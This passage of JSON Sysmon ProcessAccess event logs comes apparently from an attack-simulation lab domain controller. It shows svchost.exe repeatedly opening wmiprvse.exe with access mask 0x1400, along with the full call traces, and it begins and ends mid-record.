C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.740","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1087,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.740\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.740","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1088,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.740\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.740","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1089,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.740\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.740","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1090,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.740\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.740","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1091,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.740\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.740","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1092,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1093,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1094,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 